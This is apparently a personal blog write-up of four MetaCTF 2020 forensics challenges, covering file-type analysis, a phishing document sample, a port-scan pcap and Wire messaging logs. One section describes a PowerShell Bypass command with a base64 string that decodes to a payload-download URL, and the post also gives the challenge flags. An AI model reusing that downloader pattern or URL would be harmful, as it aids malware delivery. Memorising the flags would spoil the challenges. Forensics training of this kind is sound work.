MetaCTF Cyber Games 2020 was hosted by MetaCTF Team, a group of students from the University of Virginia who wanted to make cybersecurity more accessible.
In this year’s competition, I was working solo, and mainly focusing on the forensics challenge (which is one of my best subjects). I wasn’t competing to win anything, but just to learn new techniques and see different challenges. MetaCTF had plenty of fun challenges, and some close to a real scenario when working with forensics.
Staging 123
“The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.
There was a suspicious file created during the time frame of Threat Actor activity: C:\123.tmp. Can you check it out? “
This challenge was more of an introduction for forensics challenges. A lot of CTFs have the first 1 or 2 challenges be pretty straight forward , like a warm up.
In this particular challenge, we are given a file called “123.tmp” . I have a small procedure every time I start working on challenges, that involves checking file type, check it with binwalk, and so on.
Upon checking the file type, we get the information that this file is an .rar file instead, so we can just use the Linux tool “unrar” to extract the contents:
Once extracted, we get the flag.
MetaCTF{definitly_n0t_all_0f_y0ur_sensitive_data}
Publish3r
“We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}”
For this challenge, we are given a file that I wasn’t very familiar with : CDF V2 Document (Composite Document File from Windows). This file requried a windows software to open it, but since I didn’t have any close to me (I mainly use Cent-OS at work lol) I had to find another way.
Simply enough, this is a data file, which allows me to strings it and get information from it. Running strings, I looked at the content to see if I could find anything interesting or out of the ordinary.
Right away, I notice a power shell command being executed with a Bypass command, running a base64 strings… I mean, what else could it be? This can be our golden ticket.
Decoding this base64 string, we get our flag:
MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}
Open Thermal Exhaust Port
“Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?
The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.”
The description of the challenge is pretty straight forward : find what ports were scanned and reported open.
I have worked with wireshark constantly with CTF challenges and work. One thing that I know about nmap scans (most of the cases), it tries to make a TCP hand shark (SYN, SYN ACK ACK). So the “scanner” sends a SYN, and the target responds with SYN ACK if its open (in this case).
The “cheap” way for me to solve this challenge, is to search in the pcap file, for where SYN ACK happens from the host computer , responding back to the “scanner”
So , we can find all ports that are replying with a SYN ACK , for example, port 3128:
Once we have all the ports, we can add them up to get the flag:
MetaCTF{3770}
Just In Time
“Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.
We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example, 123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant files) deleted.”
This was a fun and challenging challenge (this doesn’t sounds right). We ware given just the Users directory of a windows machine and we need to find “the address of the meet.” There are over 6k folders and 60k+ files given to us.
So where to start? First thing I did was assuming the only user name in the folder is our target:
Most apps, usually have a folder in appdata and some will save files in Appdata/Roaming , like a “profile” so if you login in another computer, it carries over. I am not a windows expert, but that’s my understanding.
First place I started looking for was in AppData and once in there, I mainly worked in Roaming and Local folders:
In Roaming folder, I found a few apps. Two struck my attention: Discord and Wire. I first thought it was discord that it was used for the communication, but discord is not necessarily used to send secretive encrypted messages. So I took a look at this weird Wire program:
This seems to be the program we are looking for. I struggled a little going over this particular program file and analysis its folders, see if there is any logs of conversations etc…
I though this was the solution, but I was wrong. Nothing important here. After a long search, and using the “find” command to search for logs, I found an interesting folder containing some logs:
I also learned a little about this particular folder, where people had issues of the app constantly write to disk: https://github.com/wireapp/wire-desktop/issues/2108
I saw that some logs have “contents” in the logs, so I did a quick strings in all files just in case there was any special file and grep for any content:
Fair enough, I found the address.
MetaCTF{933 English Muffin Way}
Note that are possibly easier ways to solve this challenge. I could probably just come up with a beefy one liner with the find command and search for an address pattern (like 3 numbers followed by words etc…). But I was more interesting in investigate what was given to me.
Cheers.
